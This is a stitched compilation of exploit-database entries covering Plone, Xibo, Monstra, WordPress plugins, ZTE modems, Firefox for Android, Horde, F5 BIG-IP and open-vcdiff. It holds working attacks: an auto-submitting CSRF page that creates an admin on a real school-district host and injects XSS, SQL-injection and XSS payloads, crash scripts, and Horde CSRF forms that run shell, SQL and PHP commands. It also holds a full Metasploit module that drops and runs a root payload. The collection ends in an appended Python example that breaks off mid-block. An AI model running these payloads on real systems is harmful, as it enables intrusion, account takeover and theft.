source: https://www.securityfocus.com/bid/61964/info
Plone is prone to a session-hijacking vulnerability.
An attacker can exploit this issue to hijack user sessions and gain unauthorized access to the affected application.
Note: This issue was previously discussed in BID 61544 (Plone Multiple Remote Security Vulnerabilities), but has been moved to its own record to better document it.
https://www.example.com/acl_users/credentials_cookie_auth/require_login?next=+https%3A//www.csnc.ch
source: https://www.securityfocus.com/bid/62010/info
cm3 Acora CMS is prone to an information-disclosure vulnerability.
Successful exploits of this issue lead to disclosure of sensitive information which may aid in launching further attacks.
http://www.example.com/AcoraCMS/Admin/top.aspx
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg" /></div>
source: https://www.securityfocus.com/bid/61974/info
SearchBlox is prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to obtain sensitive information that may aid in launching further attacks.
SearchBlox 7.4 Build 1 is vulnerable; other versions may also be affected.
http://www.example.com/searchblox/servlet/CollectionListServlet?action=getList&orderBy=colName&direction=asc
source: https://www.securityfocus.com/bid/62024/info
Nmap is prone to an arbitrary file-write vulnerability.
An attacker can exploit this issue to write arbitrary files with the permissions of the user running the nmap client. This will allow the attacker to fully compromise the affected machine.
Nmap 6.25 is vulnerable; other versions may also be affected.
nmap --script domino-enum-passwords -p 80 <evil_host> --script-args domino-enum-passwords.username='patrik karlsson',domino-enum-passwords.password=secret,domino-enum-passwords.idpath='/tmp'
source: https://www.securityfocus.com/bid/62036/info
Aloaha PDF Suite is prone to a stack-based buffer-overflow vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/62036.zip
source: https://www.securityfocus.com/bid/62064/info
Xibo is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Xibo 1.4.2 is vulnerable; other versions may also be affected.
<html>
<head>
<title> Xibo - Digital Signage 1.4.2 CSRF Exploit.</title>
<!--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# CVE: CSRF - CVE-2013-4889, XSS - CVE-2013-4888
# http://infosec42.blogspot.com
# http://securityevaluators.com
-->
</head>
<body>
<h1>Please wait... </h1>
<script type="text/javascript">
  //Add super user
  function RF1(){
    document.write('<form name="addAdmin" target ="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=user&q=AddUser&ajax=true" method="post">'+
      '<input type="hidden" name="userid" value="0">'+
      '<input type="hidden" name="username" value="Gimppy">'+
      '<input type="hidden" name="password" value="ISE">'+
      '<input type="hidden" name="email" value="Gimppy@infosec42.com">'+
      '<input type="hidden" name="usertypeid" value="1">'+
      '<input type="hidden" name="groupid" value="1">'+
      '</form>');
  }
  //Set XSS Payloads (inner single quotes are escaped so the string literal stays valid)
  function RF2(){
    document.write('<form name="addXSS" target="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=layout&q=add&ajax=true" method="post">'+
      '<input type="hidden" name="layoutid" value="0">'+
      '<input type="hidden" name="layout" value="Gimppy<img src=42 onerror=\'alert(42)\'>">'+
      '<input type="hidden" name="description" value="<iframe src=\'http://securityevaluators.com\' width=100 height=1000</iframe>">'+
      '<input type="hidden" name="tags" value="">'+
      '<input type="hidden" name="templateid" value="0">'+
      '</form>');
  }
  function createPage(){
    RF1();
    RF2();
  }
  function _addAdmin(){
    document.addAdmin.submit();
  }
  function _addXSS(){
    document.addXSS.submit();
  }
  //Called Functions: build both forms, then submit them half a second apart
  createPage();
  window.setTimeout(_addAdmin, 500);
  window.setTimeout(_addXSS, 1000);
</script>
</body>
</html>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : SuperScan 4.1 Scan Hostname/IP Field Buffer Overflow Crash PoC
# Discovery by : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date : 18/11/2015
# Vendor Homepage : http://www.foundstone.com
# Software Link : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version : 4.1
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1.py
# 2.- Open super_scan_4.1.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Scan > Hostname/IP
# 5.- Clic on add button (->)
# 6.- Crashed
buffer = "\x41" * 636
eip = "\x42" * 4
f = open ("super_scan_4.1.txt", "w")
f.write(buffer + eip)
f.close()
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57]
*CVE-ID*:
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259
*Note*: Large deployment size, primarily in Peru, used by TdP.
1 *Insufficient authorization controls*
*CVE-ID*: CVE-2015-7257
Observed in Password Change functionality. Other functions may be
vulnerable as well.
*Expected behavior:*
Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.
*Vulnerability:*
Any non-admin user can change 'admin' password.
*Steps to reproduce:*
a. Login as user 'support' password XXX
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and Tamper the parameter username change from 'support' to
'admin'
e. Enter the new password > old password is not requested > Submit
> Login as admin
-> Pwn!
2 *Sensitive information disclosure - clear-text passwords*
*CVE-ID*: CVE-2015-7258
Displaying user information over Telnet connection, shows all valid users
and their passwords in clear-text.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
Username: admin
Password: < admin/XXX1
$sh
ADSL#login show <-- shows user information
Username Password Priority
admin password1 2
support password2 0
admin password3 1
3 *(Potential) Backdoor account feature - insecure account management*
*CVE-ID*: CVE-2015-7259
Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.
It is considered as a (redundant) login support *feature*.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
User Access Verification
Username: admin
Password: <-- admin/password3
$sh
ADSL#login show
Username Password Priority
admin password1 2
support password2 0
admin password3 1
+++++
--
Best Regards,
Karn Ganeshen
source: https://www.securityfocus.com/bid/62586/info
ShareKM is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause the server to crash or disconnect, denying service to legitimate users.
ShareKM 1.0.19 is vulnerable; prior versions may also be affected.
#!/usr/bin/python
import socket

TCP_IP = '192.168.1.100'    # address of the ShareKM server under test
TCP_PORT = 55554            # ShareKM listening port
BUFFER_SIZE = 1024
MESSAGE = b"\x41" * 50000   # oversized message; bytes so it runs on Python 2 and 3

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.sendall(MESSAGE)          # sendall writes the whole buffer, send() may write only part
s.close()
source: https://www.securityfocus.com/bid/62581/info
MentalJS is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass sandbox security restrictions and perform unauthorized actions; this may aid in launching further attacks.
http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E
source: https://www.securityfocus.com/bid/62572/info
Monstra CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Monstra 1.2.0 is vulnerable; other versions may also be affected.
POST /admin/ HTTP/1.1
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=f6bd4782f77e4027d3975d32c414a36d
Host: XXX
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
login=-1' or 85 = '83&login_submit=Enter&password=lincoln.dll
source: https://www.securityfocus.com/bid/62513/info
The RokMicroNews plugin for WordPress is prone to multiple security vulnerabilities, including:
1. An information-disclosure vulnerability
2. A cross-site scripting vulnerability
3. An arbitrary file-upload vulnerability
4. A denial-of-service vulnerability
Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform denial-of-service attacks, and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://
http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example1.com/big_file&h=1&w=1
http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example2.com/shell.php
source: https://www.securityfocus.com/bid/62493/info
The RokIntroScroller plugin for WordPress is prone to multiple security vulnerabilities, including:
1. An arbitrary file-upload vulnerability
2. A cross-site scripting vulnerability
3. An information-disclosure vulnerability
4. A denial-of-service vulnerability
Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform denial-of-service attacks, and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
RokIntroScroller 1.8 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/page.png&h=1&w=1111111
http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/big_file&h=1&w=1
http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/shell.php
http://www.example.com/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php
source: https://www.securityfocus.com/bid/62480/info
Mozilla Firefox is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass the same-origin policy and certain access restrictions to access data, or execute arbitrary script code in the browser of an unsuspecting user in the context of another site. This could be used to steal sensitive information or launch other attacks.
Note: This issue was previously discussed in BID 62447 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2013-76 through -92 Multiple Vulnerabilities), but has been moved to its own record to better document it.
This issue is fixed in Firefox 24.0.
package jp.mbsd.terada.attackfirefox1;

import android.net.Uri;
import android.os.Bundle;
import android.app.Activity;
import android.content.Intent;

public class MainActivity extends Activity {
    public final static String MY_PKG =
        "jp.mbsd.terada.attackfirefox1";
    public final static String MY_TMP_DIR =
        "/data/data/" + MY_PKG + "/tmp/";
    public final static String HTML_PATH =
        MY_TMP_DIR + "A" + Math.random() + ".html";
    public final static String TARGET_PKG =
        "org.mozilla.firefox";
    public final static String TARGET_FILE_PATH =
        "/data/data/" + TARGET_PKG + "/files/mozilla/profiles.ini";
    public final static String HTML =
        "<u>Wait a few seconds.</u>" +
        "<script>" +
        "function doit() {" +
        "  var xhr = new XMLHttpRequest;" +
        "  xhr.onload = function() {" +
        "    alert(xhr.responseText);" +
        "  };" +
        "  xhr.open('GET', document.URL);" +
        "  xhr.send(null);" +
        "}" +
        "setTimeout(doit, 8000);" +
        "</script>";

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        doit();
    }

    public void doit() {
        try {
            // create a malicious HTML file in a world-readable directory
            cmdexec("mkdir " + MY_TMP_DIR);
            cmdexec("echo \"" + HTML + "\" > " + HTML_PATH);
            cmdexec("chmod -R 777 " + MY_TMP_DIR);
            Thread.sleep(1000);
            // force Firefox to load the malicious HTML
            invokeFirefox("file://" + HTML_PATH);
            Thread.sleep(4000);
            // replace the HTML with a symbolic link to profiles.ini
            cmdexec("rm " + HTML_PATH);
            cmdexec("ln -s " + TARGET_FILE_PATH + " " + HTML_PATH);
        }
        catch (Exception e) {}
    }

    public void invokeFirefox(String url) {
        Intent intent = new Intent(Intent.ACTION_VIEW, Uri.parse(url));
        intent.setClassName(TARGET_PKG, TARGET_PKG + ".App");
        startActivity(intent);
    }

    public void cmdexec(String cmd) {
        try {
            String[] tmp = new String[] {"/system/bin/sh", "-c", cmd};
            Runtime.getRuntime().exec(tmp);
        }
        catch (Exception e) {}
    }
}
Advisory ID: HTB23272
Product: Horde Groupware
Vendor: http://www.horde.org
Vulnerable Version(s): 5.2.10 and probably prior
Tested Version: 5.2.10
Advisory Publication: September 30, 2015 [without technical details]
Vendor Notification: September 30, 2015
Vendor Patch: October 22, 2015
Public Disclosure: November 18, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-7984
Risk Level: High
CVSSv3 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered three Cross-Site Request Forgery (CSRF) vulnerabilities in Horde Groupware, a popular collaboration suite used by a variety of companies around the world. These vulnerabilities are very dangerous, since they can be used in targeted attacks against corporate clients. An attacker might be able to gain unauthorized access to information stored in the database, execute arbitrary commands on the server, compromise the entire application and perform attacks against application users and the company's infrastructure.
1) Cross-Site Request Forgery in Horde Groupware: CVE-2015-7984
1.1 The vulnerability exists because the "/admin/cmdshell.php" script fails to properly verify the source of the HTTP request. A remote attacker can trick a logged-in administrator into visiting a malicious page with a CSRF exploit and execute arbitrary system commands on the server.
The CSRF exploit below sends an HTTP POST request to the vulnerable script and instructs it to display the output of the "/bin/ls" command. As a result, you will see the contents of the "/admin/" directory:
<form action="http://[host]/admin/cmdshell.php" method="post" name="main">
<input type="hidden" name="cmd" value="ls">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
1.2 The vulnerability exists because the "/admin/sqlshell.php" script fails to properly verify the source of the HTTP request. A remote attacker can trick a logged-in administrator into visiting a malicious page with a CSRF exploit and execute arbitrary SQL queries against the application's database.
The exploit code below executes the "SELECT version()" query and displays the version of the current MySQL server:
<form action="http://[host]/admin/sqlshell.php" method="post" name="main">
<input type="hidden" name="sql" value="SELECT version()">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
1.3 The vulnerability exists because the "/admin/phpshell.php" script fails to properly verify the source of the HTTP request. A remote attacker can trick a logged-in administrator into visiting a malicious page with a CSRF exploit and execute arbitrary PHP code on the server.
The exploit code below executes the "phpinfo()" function and displays its output:
<form action="http://[host]/admin/phpshell.php" method="post" name="main">
<input type="hidden" name="app" value="horde">
<input type="hidden" name="php" value="phpinfo();">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Horde Groupware 5.2.11
More Information:
http://lists.horde.org/archives/announce/2015/001137.html
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23272 - https://www.htbridge.com/advisory/HTB23272 - Multiple CSRF Vulnerabilities in Horde Groupware.
[2] Horde Groupware - http://www.horde.org - Horde Groupware is a free, enterprise ready, browser based collaboration suite.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'nokogiri'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" }
STRING_ATTRS = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
LONG_ATTRS = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
def initialize(info = {})
super(
update_info(
info,
'Name' => "F5 iControl iCall::Script Root Command Execution",
'Description' => %q{
This module exploits an authenticated privilege escalation
vulnerability in the iControl API on the F5 BIG-IP LTM (and likely
other F5 devices). This requires valid credentials and the Resource
Administrator role. The exploit should work on BIG-IP 11.3.0
- 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references
for more details)
},
'License' => MSF_LICENSE,
'Author' =>
[
'tom', # Discovery, Metasploit module
'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module
],
'References' =>
[
['CVE', '2015-3628'],
['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'],
['URL', 'https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['F5 BIG-IP LTM 11.x', {}]
],
'Privileged' => true,
'DisclosureDate' => "Sep 3 2015",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/iControl/iControlPortal.cgi']),
OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
])
register_advanced_options(
[
OptInt.new('SESSION_WAIT', [ true, 'The max time to wait for a session, in seconds', 5 ]),
OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']),
OptString.new('FILENAME', [false, 'File name of the dropped payload, defaults to random']),
OptInt.new('ARG_MAX', [true, 'Command line length limit', 131072])
])
end
def setup
file = datastore['FILENAME']
file ||= ".#{Rex::Text.rand_text_alphanumeric(16)}"
@payload_path = ::File.join(datastore['PATH'], file)
super
end
def build_xml
builder = Nokogiri::XML::Builder.new do |xml|
xml.Envelope do
xml = xml_add_namespaces(xml)
xml['soapenv'].Header
xml['soapenv'].Body do
yield xml
end
end
end
builder.to_xml
end
def xml_add_namespaces(xml)
ns = xml.doc.root.add_namespace_definition("soapenv", "http://schemas.xmlsoap.org/soap/envelope/")
xml.doc.root.namespace = ns
xml.doc.root.add_namespace_definition("xsi", "http://www.w3.org/2001/XMLSchema-instance")
xml.doc.root.add_namespace_definition("xsd", "http://www.w3.org/2001/XMLSchema")
xml.doc.root.add_namespace_definition("scr", "urn:iControl:iCall/Script")
xml.doc.root.add_namespace_definition("soapenc", "http://schemas.xmlsoap.org/soap/encoding")
xml.doc.root.add_namespace_definition("per", "urn:iControl:iCall/PeriodicHandler")
xml
end
def send_soap_request(pay)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'POST',
'data' => pay,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
)
if res
return res
else
vprint_error('No response')
end
false
end
def create_script(name, cmd)
create_xml = build_xml do |xml|
xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item name
end
xml.definitions(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item cmd
end
end
end
send_soap_request(create_xml)
end
def delete_script(script_name)
delete_xml = build_xml do |xml|
xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item script_name
end
end
end
print_error("Error while cleaning up script #{script_name}") unless (res = send_soap_request(delete_xml))
res
end
def script_exists?(script_name)
exists_xml = build_xml do |xml|
xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
end
res = send_soap_request(exists_xml)
res && res.code == 200 && res.body =~ Regexp.new("/Common/#{script_name}")
end
def create_handler(handler_name, script_name)
print_status("Creating trigger #{handler_name}")
handler_xml = build_xml do |xml|
xml['per'].create(SOAPENV_ENCODINGSTYLE) do
xml.handlers(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item handler_name
end
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item script_name
end
xml.intervals(LONG_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
# we set this to run once every 24h, but because there is no
# start/end time it will run once, more or less immediately, and
# again 24h from now, but by that point hopefully we will have
# cleaned up and the handler/script/etc are gone
xml.item 60 * 60 * 24
end
end
end
res = send_soap_request(handler_xml)
if res
if res.code == 200 && res.body =~ Regexp.new("iCall/PeriodicHandler")
true
else
print_error("Trigger creation failed -- HTTP/#{res.proto} #{res.code} #{res.message}")
false
end
else
print_error("No response to trigger creation")
false
end
end
def delete_handler(handler_name)
delete_xml = build_xml do |xml|
xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do
xml.handlers(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item handler_name
end
end
end
print_error("Error while cleaning up handler #{handler_name}") unless (res = send_soap_request(delete_xml))
res
end
def handler_exists?(handler_name)
handler_xml = build_xml do |xml|
xml['per'].get_list(SOAPENV_ENCODINGSTYLE)
end
res = send_soap_request(handler_xml)
res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
end
def check
# strategy: we'll send a create_script request, with empty name:
# if everything is ok, the server return a 500 error saying it doesn't like empty names
# XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'.
# if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
# any other response is considered not vulnerable
res = create_script('', '')
if res && res.code == 500 && res.body =~ /path is empty/
return Exploit::CheckCode::Appears
elsif res && res.code == 401
print_warning("HTTP/#{res.proto} #{res.code} #{res.message} -- incorrect USERNAME or PASSWORD?")
return Exploit::CheckCode::Unknown
else
return Exploit::CheckCode::Safe
end
end
def exploit
# phase 1: create iCall script to create file with payload, execute it and remove it.
shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path})
cmd = %(exec /bin/sh -c "#{shell_cmd}")
arg_max = datastore['ARG_MAX']
if shell_cmd.size > arg_max
print_error "Payload #{datastore['PAYLOAD']} is too big, try a different payload "\
"or increasing ARG_MAX (note that payloads bigger than the target's configured ARG_MAX value may fail to execute)"
return false
end
script_name = "script-#{Rex::Text.rand_text_alphanumeric(16)}"
print_status("Uploading payload script #{script_name}")
unless (create_script_res = create_script(script_name, cmd))
print_error("No response when uploading payload script")
return false
end
unless create_script_res.code == 200
print_error("Upload payload script failed -- HTTP/#{create_script_res.proto} "\
"#{create_script_res.code} #{create_script_res.message}")
return false
end
unless script_exists?(script_name)
print_error("Payload script uploaded successfully but script was not found")
return false
end
register_file_for_cleanup @payload_path
# phase 2: create iCall Handler, that will actually run the previously created script
handler_name = "handler-#{Rex::Text.rand_text_alphanumeric(16)}"
unless create_handler(handler_name, script_name)
delete_script(script_name)
return false
end
unless handler_exists?(handler_name)
print_error("Trigger created successfully but was not found")
delete_script(script_name)
return false
end
print_status('Waiting for payload to execute...')
# if our payload has not been successfully executed just yet, wait
# until it does or give up
slept = 0
until session_created? || slept > datastore['SESSION_WAIT']
Rex.sleep(1)
slept += 1
end
print_status('Trying cleanup...')
delete_script(script_name)
delete_handler(handler_name)
end
end
Source: https://code.google.com/p/google-security-research/issues/detail?id=513
There's an integer overflow issue in sanity checking section lengths when parsing the vcdiff format (used in SDCH content encoding). This results in the parser parsing outside of sane memory bounds when parsing the contents of a vcdiff window - see attached crash PoC.
(/src/sdch/open-vcdiff/src/headerparser.cc)
bool VCDiffHeaderParser::ParseSectionLengths(
    bool has_checksum,
    size_t* add_and_run_data_length,
    size_t* instructions_and_sizes_length,
    size_t* addresses_length,
    VCDChecksum* checksum) {
  ParseSize("length of data for ADDs and RUNs", add_and_run_data_length);  // <---- user controlled
  ParseSize("length of instructions section", instructions_and_sizes_length);  // <---- user controlled
  ParseSize("length of addresses for COPYs", addresses_length);  // <---- user controlled
  if (has_checksum) {
    ParseChecksum("Adler32 checksum value", checksum);
  }
  if (RESULT_SUCCESS != return_code_) {
    return false;
  }
  if (!delta_encoding_start_) {
    VCD_DFATAL << "Internal error: VCDiffHeaderParser::ParseSectionLengths "
                  "was called before ParseWindowLengths" << VCD_ENDL;
    return_code_ = RESULT_ERROR;
    return false;
  }
  const size_t delta_encoding_header_length =
      UnparsedData() - delta_encoding_start_;
  if (delta_encoding_length_ !=
      (delta_encoding_header_length +
       *add_and_run_data_length +
       *instructions_and_sizes_length +
       *addresses_length)) {  // <---- Integer overflow here (32-bit systems only)
    VCD_ERROR << "The length of the delta encoding does not match "
                 "the size of the header plus the sizes of the data sections"
              << VCD_ENDL;
    return_code_ = RESULT_ERROR;
    return false;
  }
  return true;
}
These returned lengths are subsequently used to initialise length-checked buffer objects for continuing the parsing (vcdecoder.cc:1024)
  size_t add_and_run_data_length = 0;
  size_t instructions_and_sizes_length = 0;
  size_t addresses_length = 0;
  if (!header_parser->ParseSectionLengths(has_checksum_,
                                          &add_and_run_data_length,
                                          &instructions_and_sizes_length,
                                          &addresses_length,
                                          &expected_checksum_)) {
    return header_parser->GetResult();
  }
  if (parent_->AllowInterleaved() &&
      // snip...
  } else {
    // If interleaved format is not used, then the whole window contents
    // must be available before decoding can begin.  If only part of
    // the current window is available, then report end of data
    // and re-parse the whole header when DecodeChunk() is called again.
    if (header_parser->UnparsedSize() < (add_and_run_data_length +
                                         instructions_and_sizes_length +
                                         addresses_length)) {
      return RESULT_END_OF_DATA;
    }
    data_for_add_and_run_.Init(header_parser->UnparsedData(),
                               add_and_run_data_length);
    instructions_and_sizes_.Init(data_for_add_and_run_.End(),
                                 instructions_and_sizes_length);
    addresses_for_copy_.Init(instructions_and_sizes_.End(), addresses_length);
This issue only affects 32-bit builds, since ParseSize is parsing a positive int32_t; on 64-bit builds it cannot be large enough to wrap a size_t.
It's unclear if this is exploitable as a browser-process infoleak; the results of SDCH decoding will be returned to a renderer process, but the way that the returned values are used mean that it is likely that the process will have to survive reads at opposite ends of the address space, which *should* be guaranteed to crash with a 2:2 address space split. It is possible that on 32-bit Windows with a 1:3 address space split this can be survived, or with careful crafting of the input file these reads can be avoided; I've not investigated further at this point.
It appears to be necessary to host the PoC on a legitimate domain, as localhost is not supported for SDCH.
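To make the wrap concrete, here is an added example (not open-vcdiff's code) that models the 32-bit `size_t` sum from the check above with Python integers masked to 32 bits, and places an overflow-safe form of the same check beside it. The function names and the sample lengths are constructed for illustration; the only page-derived fact it relies on is that each section length comes from `ParseSize` as a non-negative `int32_t`, so no single length can wrap on its own but the sum of three can.

```python
# Added example, not open-vcdiff code. Models the 32-bit size_t arithmetic
# behind the window-length check in VCDiffDeltaFileWindow and shows an
# overflow-safe way to write that check. Section lengths are what ParseSize
# yields: non-negative int32 values, so each is at most INT32_MAX.
SIZE_T_MAX_32 = 0xFFFFFFFF          # size_t on a 32-bit build
INT32_MAX = 0x7FFFFFFF              # upper bound of one ParseSize result


def naive_window_fits(unparsed_size, add_run_len, instr_len, addr_len):
    """Same comparison as the original code, with the sum truncated the way
    a 32-bit size_t truncates it. Returns True when decoding would proceed
    on this window."""
    for length in (add_run_len, instr_len, addr_len):
        assert 0 <= length <= INT32_MAX
    total = (add_run_len + instr_len + addr_len) & SIZE_T_MAX_32
    return not (unparsed_size < total)


def safe_window_fits(unparsed_size, add_run_len, instr_len, addr_len):
    """Overflow-safe replacement: consume the remaining budget one section
    at a time. Each comparison happens before the subtraction, so no
    intermediate value can exceed unparsed_size and nothing can wrap."""
    remaining = unparsed_size
    for length in (add_run_len, instr_len, addr_len):
        if length < 0 or length > remaining:
            return False
        remaining -= length
    return True


def compare_checks(unparsed_size, add_run_len, instr_len, addr_len):
    """Return (naive_result, safe_result, wrapped_sum) for one window."""
    wrapped = (add_run_len + instr_len + addr_len) & SIZE_T_MAX_32
    return (naive_window_fits(unparsed_size, add_run_len, instr_len, addr_len),
            safe_window_fits(unparsed_size, add_run_len, instr_len, addr_len),
            wrapped)


if __name__ == "__main__":
    # Constructed window header: two sections of INT32_MAX bytes and a third
    # of 0x12 bytes, with only 0x100 bytes of delta data actually present.
    # The true sum is 0x100000010; truncated to 32 bits it is 0x10, so the
    # naive check passes and Init() is handed lengths far beyond the buffer.
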